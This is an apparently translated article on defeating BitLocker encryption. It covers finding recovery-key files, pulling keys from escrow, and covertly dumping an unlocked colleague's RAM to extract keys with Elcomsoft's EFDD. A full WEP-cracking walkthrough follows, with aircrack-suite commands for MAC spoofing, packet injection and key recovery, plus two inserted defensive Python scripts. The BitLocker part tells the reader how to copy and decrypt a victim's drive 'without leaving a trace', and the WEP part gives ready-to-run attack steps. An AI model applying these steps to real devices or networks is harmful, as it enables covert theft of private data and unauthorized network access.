Another alleged reason for abandoning the additional algorithm is the lack of hardware acceleration for Elephant Diffuser and the loss of speed when using it. However, in previous years, when processors were slower, the encryption speed was somehow acceptable. And AES itself was widely used even before there were separate instruction sets and specialized chips to accelerate it. Over time, hardware acceleration could have been built for Elephant Diffuser as well, or customers could at least have been given a choice between speed and security.

Another, unofficial version looks more realistic. The "elephant" got in the way of employees who wanted to spend less effort decrypting the next disk, and Microsoft willingly cooperates with authorities even in cases where their requests are not entirely legal. The conspiracy theory is indirectly supported by the fact that before Windows 8, the pseudo-random number generator built into Windows was used to create BitLocker encryption keys. In many (if not all) releases of Windows this was Dual_EC_DRBG, a "cryptographically strong PRNG" developed by the US National Security Agency and containing a number of inherent vulnerabilities.

Of course, the covert weakening of the built-in encryption caused a powerful wave of criticism. Under its pressure, Microsoft rewrote BitLocker again, replacing the PRNG with CTR_DRBG in new releases of Windows. Additionally, in Windows 10 (starting with build 1511), the default encryption scheme is AES-XTS, which is immune to ciphertext block manipulation. In the latest builds of Windows 10, other known BitLocker shortcomings were fixed, but the main problem remains. It is so absurd that it makes the other improvements meaningless. It concerns the principles of key management.

The task of decrypting BitLocker drives is also made easier by the fact that Microsoft actively promotes an alternative method of restoring access to data through the Data Recovery Agent. The point of the "Agent" is that it encrypts the encryption keys of all drives within the enterprise network with a single access key. Once you have it, you can decrypt any key, and thus any disk used by the same company. Convenient? Yes, especially for hacking.

The idea of using one key for all locks has been compromised many times, but it keeps returning in one form or another for the sake of convenience. Here is how Ralph Leighton recorded Richard Feynman's recollection of one characteristic episode of his work on the Manhattan Project at the Los Alamos laboratory: "... I opened three safes - and all three with one combination. I did them all: I opened the safes with all the secrets of the atomic bomb - the technology for obtaining plutonium, a description of the purification process, information about how much material is needed, how the bomb works, how neutrons are made, how the bomb is arranged, what its dimensions are - in short, everything that they knew in Los Alamos, the whole kitchen!"

BitLocker is somewhat reminiscent of the safe described in another fragment of the book "Surely You're Joking, Mr. Feynman!". The most imposing safe in the top-secret laboratory had the same vulnerability as a simple filing cabinet. "... It was a colonel, and he had a much more tricky two-door safe with large handles that pulled four steel rods three-quarters of an inch thick out of the frame. I looked at the back of one of the imposing bronze doors and found that the digital dial was connected to a small padlock that looked exactly like the lock on my Los Alamos cabinet. It was obvious that the system of levers depended on the same small rod that locked the filing cabinets... Depicting some kind of activity, I began to twist the dial at random. Two minutes later - click! - the safe was open. When the safe door or the top drawer of the filing cabinet is open, it is very easy to find the combination. That is what I did while you were reading my report, just to show you the danger."

BitLocker crypto containers are quite secure on their own. If someone brings you a flash drive from nowhere, encrypted with BitLocker To Go, you are unlikely to decrypt it in a reasonable time. However, in real-world use of encrypted drives and removable media, there are many vulnerabilities that are easy to exploit to bypass BitLocker.

BitLocker Vulnerabilities

Surely you have noticed that when you first activate BitLocker, you have to wait a long time. This is not surprising: sector-by-sector encryption can take several hours, since merely reading every block of a terabyte HDD takes that long. However, disabling BitLocker happens almost instantly. How can that be?

The fact is that when it is disabled, BitLocker does not decrypt the data. All sectors remain encrypted with the FVEK. It is simply that access to this key is no longer restricted in any way. All checks are disabled, and the VMK is stored among the cleartext metadata. Each time the computer is turned on, the OS loader reads the VMK (now without checking the TPM or requesting a key on a flash drive or a password), automatically decrypts the FVEK with it, and then decrypts all files as they are accessed. To the user, everything looks like a complete absence of encryption, but the most attentive may notice a slight decrease in the performance of the disk subsystem. More precisely, the absence of a speed increase after disabling encryption.

There is something else interesting in this scheme. Despite the name (full disk encryption technology), some data remains unencrypted when BitLocker is used. The MBR and boot sector remain in the clear (unless the disk was initialized as GPT), as do bad sectors and metadata. An unencrypted bootloader leaves room for imagination. Pseudo-bad sectors are a convenient place to hide other malware, and the metadata contains a lot of interesting things, including copies of keys. If BitLocker is active, they are encrypted (but more weakly than the FVEK encrypts the sector contents); if it is deactivated, they simply lie in the clear. These are all potential attack vectors. They are only potential because, besides them, there are much simpler and more universal ones.

Bitlocker recovery key

In addition to the FVEK, VMK, and SRK, BitLocker uses another type of key that is generated "just in case". These are the recovery keys, with which another popular attack vector is associated. Users are afraid of forgetting their password and losing access to the system, and Windows itself recommends that they set up an emergency login. To do this, the BitLocker encryption wizard prompts you in the last step to create a recovery key. There is no option to decline. You can only choose one of the key export options, each of which is very vulnerable.

In the default settings, the key is exported as a plain text file with a recognizable name: "BitLocker Recovery Key #", where # is replaced by the computer ID (yes, right in the file name!). The key itself looks like this.

If you forgot (or never knew) the password set in BitLocker, just look for the file with the recovery key. It will almost certainly be saved among the current user's documents or on their flash drive. It may even be printed on a piece of paper, as Microsoft recommends.

To quickly find the recovery key, it is convenient to narrow the search by extension (txt), creation date (if you know approximately when BitLocker could have been enabled), and file size (1388 bytes if the file has not been edited). Once you find the recovery key, copy it. With it, you can bypass the standard BitLocker authorization at any time: just press Esc and enter the recovery key. You will log in without problems and will even be able to change the BitLocker password to an arbitrary one without specifying the old one!
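The same properties that make a stray export easy to find also let an administrator find and remove them first. As an added defender-side example (not from the article and not Microsoft's code), here is a Python scanner for a user profile or file share that uses the article's three signals (default file name, .txt extension, 1388-byte unedited size) plus a structural check of the 48-digit key; the structural rule (each six-digit group below 720896 and divisible by 11, the sixth digit acting as a checksum) is the one documented by open-source BitLocker readers such as libbde, and the files and key values in demo() are constructed.

```python
import codecs
import os
import re
import tempfile
from typing import List, Tuple

# Three signals the article names for a default export, plus the key's own structure.
DEFAULT_NAME_RE = re.compile(r"^bitlocker recovery key .*\.txt$", re.IGNORECASE)
UNEDITED_SIZE = 1388  # bytes, size of an unedited export per the article
KEY_RE = re.compile(r"\b(\d{6}(?:-\d{6}){7})\b")

def looks_like_recovery_key(candidate: str) -> bool:
    """Structural check (assumed from libbde's documentation): 8 groups of
    6 digits, each group < 720896 and divisible by 11 (6th digit = checksum)."""
    groups = candidate.split("-")
    if len(groups) != 8:
        return False
    for g in groups:
        if len(g) != 6 or not g.isdigit():
            return False
        n = int(g)
        if n >= 720896 or n % 11 != 0:
            return False
    return True

def mask(key: str) -> str:
    """Report only the first group so the scan output never contains a usable key."""
    return key[:6] + "-" + "-".join(["XXXXXX"] * 7)

def read_text(path: str) -> str:
    """Exports may be UTF-16 with a BOM or plain UTF-8; handle both."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data[:2] in (codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE):
        return data.decode("utf-16", errors="ignore")
    return data.decode("utf-8", errors="ignore")

def scan_tree(root: str) -> List[Tuple[str, str, List[str]]]:
    """Walk root; return (path, masked key or '', reasons) for each suspicious file."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons, masked = [], ""
            if DEFAULT_NAME_RE.match(name):
                reasons.append("default export file name")
            if not name.lower().endswith(".txt"):
                continue
            try:
                size = os.path.getsize(path)
                if size == UNEDITED_SIZE:
                    reasons.append("unedited export size (1388 bytes)")
                if size < 65536:  # exports are tiny; skip large logs
                    for m in KEY_RE.finditer(read_text(path)):
                        if looks_like_recovery_key(m.group(1)):
                            masked = mask(m.group(1))
                            reasons.append("valid recovery-key structure in content")
                            break
            except OSError:
                continue
            if reasons:
                hits.append((path, masked, reasons))
    return hits

def demo() -> List[Tuple[str, str, List[str]]]:
    """Build a constructed sample tree in a temp dir and scan it (no real keys)."""
    root = tempfile.mkdtemp(prefix="bl_scan_")
    good = "123453-245674-367895-490116-612337-034562-156783-279004"  # constructed, passes
    bad = "123454-245674-367895-490116-612337-034562-156783-279004"   # 1st group fails mod 11
    with open(os.path.join(root, "BitLocker Recovery Key CONSTRUCTED-ID.txt"),
              "w", encoding="utf-16") as fh:
        fh.write("Recovery Key:\n\n" + good + "\n")
    with open(os.path.join(root, "todo.txt"), "w", encoding="utf-8") as fh:
        fh.write("ticket " + bad + " is just a serial number\n")
    return scan_tree(root)

if __name__ == "__main__":
    for path, masked, reasons in demo():
        print(path, masked, ", ".join(reasons))
```

Run it over exported profile directories or a share mount point; anything it reports should be moved to the escrow location your policy prescribes and deleted from the user-reachable path.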

Opening BitLocker

A real cryptographic system is a compromise between convenience, speed and reliability. It should include procedures for transparent encryption with on-the-fly decryption, methods for recovering forgotten passwords, and convenient key handling. All this weakens any system, no matter how strong the algorithms it is based on. Therefore, there is no need to look for vulnerabilities directly in the Rijndael algorithm or in the various modes of the AES standard. It is much easier to find them in the specifics of a particular implementation.

In Microsoft's case, there is plenty of such "specificity". For example, copies of BitLocker keys are by default sent to SkyDrive and escrowed in Active Directory.

Well, what if you lose them... or Agent Smith asks for them? It is inconvenient to make a client wait, and even more so an agent. For this reason, comparisons of the cryptographic strength of AES-XTS and AES-CBC with Elephant Diffuser fade into the background, as do recommendations to increase the key length. No matter how long the key is, the attacker will easily obtain it in unencrypted form.

Retrieving escrowed keys from a Microsoft or AD account is the main way to break BitLocker. If the user has not registered an account in the Microsoft cloud and the computer is not in a domain, there are still ways to extract the encryption keys. During normal operation, unencrypted copies are always stored in RAM (otherwise there would be no "transparent encryption"). This means they are available in a memory dump and in the hibernation file.

Why are they kept there at all?

As ridiculous as it sounds, for convenience. BitLocker was designed to protect against offline attacks only. These are always accompanied by a reboot and connecting the disk to another OS, which clears the RAM. However, in the default settings the OS dumps the RAM when a crash occurs (which can be provoked) and writes all of its contents to the hibernation file each time the computer goes into deep sleep. So if someone has recently signed in to Windows with BitLocker enabled, there is a good chance of obtaining a decrypted copy of the VMK and using it to decrypt the FVEK and then the data itself down the chain.

Shall we check? All the BitLocker attack methods described above are collected in one program, Forensic Disk Decryptor, developed by the Russian company Elcomsoft. It can automatically extract encryption keys and mount encrypted volumes as virtual drives, decrypting them on the fly.

Additionally, EFDD implements another non-trivial way of obtaining keys: an attack through the FireWire port, which is useful when it is not possible to run your own software on the target computer. The EFDD program itself is always installed on our own computer, and on the attacked one we try to get by with the minimum necessary actions.

For example, let's simply boot a test system with BitLocker active and "invisibly" make a memory dump. This simulates a situation in which a colleague went out for lunch and did not lock their computer. We launch RAM Capture and in less than a minute obtain a complete dump in a file with the .mem extension and a size corresponding to the amount of RAM installed in the victim's computer.

What you use to make the dump does not, by and large, matter. Regardless of the extension, the result is a binary file, which EFDD then analyzes automatically in search of keys.

We write the dump to a USB flash drive or transfer it over the network, after which we sit down at our computer and run EFDD.

Select the "Extract keys" option and enter the path to the file with the memory dump as the source of the keys.

BitLocker is a typical crypto container, like PGP Disk or TrueCrypt. These containers have proven quite reliable on their own, but the Windows client applications that work with them scatter encryption keys across RAM. Therefore, EFDD implements a universal attack scenario: the program instantly searches for the encryption keys of all three popular types of crypto container. So you can leave all the items checked: what if the victim secretly uses TrueCrypt or PGP!

After a few seconds, Elcomsoft Forensic Disk Decryptor shows all found keys in its window. For convenience, they can be saved to a file - this will come in handy in the future.

Now BitLocker is no longer a hindrance! You can carry out a classic offline attack - for example, pull out a hard drive and copy its contents. To do this, simply connect it to your computer and run EFDD in "decrypt or mount disk" mode.

After specifying the path to the files with the saved keys, EFDD will, at your choice, perform a full decryption of the volume or immediately open it as a virtual disk. In the latter case, files are decrypted as they are accessed. Either way, no changes are made to the original volume, so you can return it the next day as if nothing had happened. EFDD works without leaving a trace and only with copies of the data, and therefore remains invisible.

BitLocker To Go

Starting with Windows 7, it became possible to encrypt flash drives, USB HDDs and other external media. A technology called BitLocker To Go encrypts removable drives in the same way as local drives. Encryption is enabled via the corresponding item in the Explorer context menu.

For new drives, you can encrypt only the used space: the free space of the partition is all zeros anyway, and there is nothing to hide there. If the drive has already been used, it is recommended to enable full encryption. Otherwise, the space marked as free remains unencrypted and may contain, in plain text, recently deleted files that have not yet been overwritten.

Even fast encryption of only the used space takes from several minutes to several hours. This time depends on the amount of data, the bandwidth of the interface, the characteristics of the drive, and the speed of the processor's cryptographic calculations. Since encryption is accompanied by compression, the free space on the encrypted disk usually increases slightly.

The next time you connect an encrypted flash drive to any computer running Windows 7 or later, the BitLocker wizard will automatically launch to unlock the drive. In Explorer, before unlocking, it will be displayed as a locked disk.

Here you can use both the BitLocker workarounds already discussed (for example, looking for the VMK in a memory dump or hibernation file) and new ones related to recovery keys.

If you do not know the password, but you managed to find one of the keys (manually or using EFDD), then there are two main options for accessing the encrypted flash drive:

  • use the built-in BitLocker wizard to work directly with the flash drive;
  • use EFDD to fully decrypt the flash drive and create its sector-by-sector image.

The first option gives immediate access to the files on the flash drive and lets you copy or change them, as well as write your own. The second option takes much longer (from half an hour), but it has its advantages. The decrypted sector-by-sector image allows a more subtle analysis of the file system afterwards, at forensic-laboratory level. In this case the flash drive itself is no longer needed and can be returned unchanged.

The resulting image can be opened immediately in any program that supports the IMA format, or first converted to another format (for example, using UltraISO).

Of course, in addition to finding the recovery key for BitLocker To Go, all other BitLocker bypass methods are supported in EFDD. Just go through all the available options in turn until you find a key of any type. The rest (down to the FVEK) will be decrypted along the chain by themselves, and you will get full access to the disk.

Conclusion

BitLocker full disk encryption technology differs between versions of Windows. Once properly configured, it allows you to create crypto containers theoretically comparable in strength to TrueCrypt or PGP. However, the built-in key-handling mechanism in Windows negates all the algorithmic tricks. In particular, the VMK used to decrypt the master key in BitLocker is recovered with EFDD in a few seconds from an escrowed duplicate, a memory dump, a hibernation file, or a FireWire port attack.

Once you have the key, you can perform a classic offline attack, covertly copying and automatically decrypting all the data on the “protected” drive. Therefore, BitLocker should only be used in conjunction with other protections: Encrypting File System (EFS), Rights Management Services (RMS), Program Startup Control, Device Installation and Connection Control, and more stringent local policies and general security measures.

The article used the materials of the site:

How is Wi-Fi hacked? Many of us have heard that when setting up a Wi-Fi access point you should never choose WEP encryption, because it is very easy to crack. Probably only a few have tried it themselves, and about as many know what it actually looks like. Below is one way of breaking into an access point with this encryption protocol, so that you can see more clearly how real the situation is when someone connects to your super-secret access point, and what such a hack involves. Naturally, this must not be used on someone else's router. This material is for informational purposes only and calls for abandoning easily cracked encryption protocols.

To perform the attack, you will need:

  • suitable Wi-Fi adapter with packet injection capability (e.g. Alfa AWUS036H)
  • BackTrack Live CD
  • your own Wi-Fi access point with WEP encryption, on which the experiment will be run
  • patience

After launching the BackTrack command line, called Konsole, you need to enter the following command:

You will see your network interface, named "ra0" or something similar. Remember this name. In what follows it will be referred to as (interface), and you substitute your own interface name. Next, enter the following 4 lines in sequence:

airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

Now we have a fake MAC address. Enter:

airodump-ng (interface)

A list of available wireless networks will begin to appear. As soon as the desired network appears in the list, press Ctrl+C to stop the search. Copy the network's BSSID and note the channel (CH column). Also make sure WEP is listed in the ENC column.

Now we start collecting information from this network:

airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

channel is the channel from the CH column, file name is the name of the file into which everything will be written, and bssid is the network identifier.

You will see something similar to the screenshot. Leave this window as it is. Open a new Konsole window and type:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

essid is the SSID name of the target network.

Wait for the message "Association successful", then enter:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

Now you need to be patient and wait until the number in the #Data column passes the 10000 mark.

When the required amount of collected data is reached, open the third Konsole window and enter:

aircrack-ng -b (bssid) (file name-01.cap)

As the file name, enter the name you chose earlier for the capture file.

If successful, you will see the line "KEY FOUND", which contains the key to the network.
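Seen from the other side, the point of the walkthrough is that any access point still showing WEP in the ENC column is one capture away from losing its key. As an added defender-side example (not from the article), here is a Python audit of the summary file airodump-ng writes beside the capture (the -w option also produces <file name>-01.csv). The column layout is assumed to be airodump-ng's CSV header (BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key), where "# IV" corresponds to the #Data column of the live display; the sample rows, BSSIDs and ESSIDs are constructed.

```python
import csv
import io
from typing import Dict, List, Tuple

# Constructed sample in the assumed airodump-ng CSV layout (made-up networks).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:AA:BB:01, 2024-01-01 12:00:00, 2024-01-01 12:10:00,  6,  54, WEP , WEP, OPN, -40,  120,  10420,   0.  0.  0.  0,   7, LabNet1, 
00:11:22:AA:BB:02, 2024-01-01 12:00:00, 2024-01-01 12:10:00, 11, 130, WPA2, CCMP, PSK, -55,   98,      0,   0.  0.  0.  0,   7, LabNet2, 
00:11:22:AA:BB:03, 2024-01-01 12:00:00, 2024-01-01 12:10:00,  1,  54, OPN , , , -70,   30,      0,   0.  0.  0.  0,   5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

CRACKABLE_IVS = 10000  # the #Data threshold the article cites for aircrack-ng

def parse_access_points(text: str) -> List[Dict[str, str]]:
    """Return the access-point section (everything before the blank line) as dicts."""
    ap_section = text.partition("\n\n")[0]
    rows = list(csv.reader(io.StringIO(ap_section), skipinitialspace=True))
    headers = [h.strip() for h in rows[0]]
    aps = []
    for row in rows[1:]:
        if len(row) < len(headers):
            continue  # truncated line, e.g. the capture was interrupted mid-write
        aps.append({h: v.strip() for h, v in zip(headers, row)})
    return aps

def audit(aps: List[Dict[str, str]]) -> List[Tuple[str, str, str, str]]:
    """(BSSID, ESSID, channel, finding) for every AP that needs remediation."""
    findings = []
    for ap in aps:
        privacy = ap.get("Privacy", "")
        ivs = int(ap.get("# IV") or 0)
        if "WEP" in privacy:
            state = ("WEP; capture already holds enough IVs to recover the key"
                     if ivs >= CRACKABLE_IVS else "WEP; migrate to WPA2/WPA3")
            findings.append((ap["BSSID"], ap["ESSID"], ap["channel"], state))
        elif privacy == "OPN":
            findings.append((ap["BSSID"], ap["ESSID"], ap["channel"], "open network"))
    return findings

def audit_sample() -> List[Tuple[str, str, str, str]]:
    """Run the audit over the constructed sample."""
    return audit(parse_access_points(SAMPLE_CSV))

if __name__ == "__main__":
    for bssid, essid, ch, state in audit_sample():
        print(f"{bssid} {essid!r} ch {ch}: {state}")
```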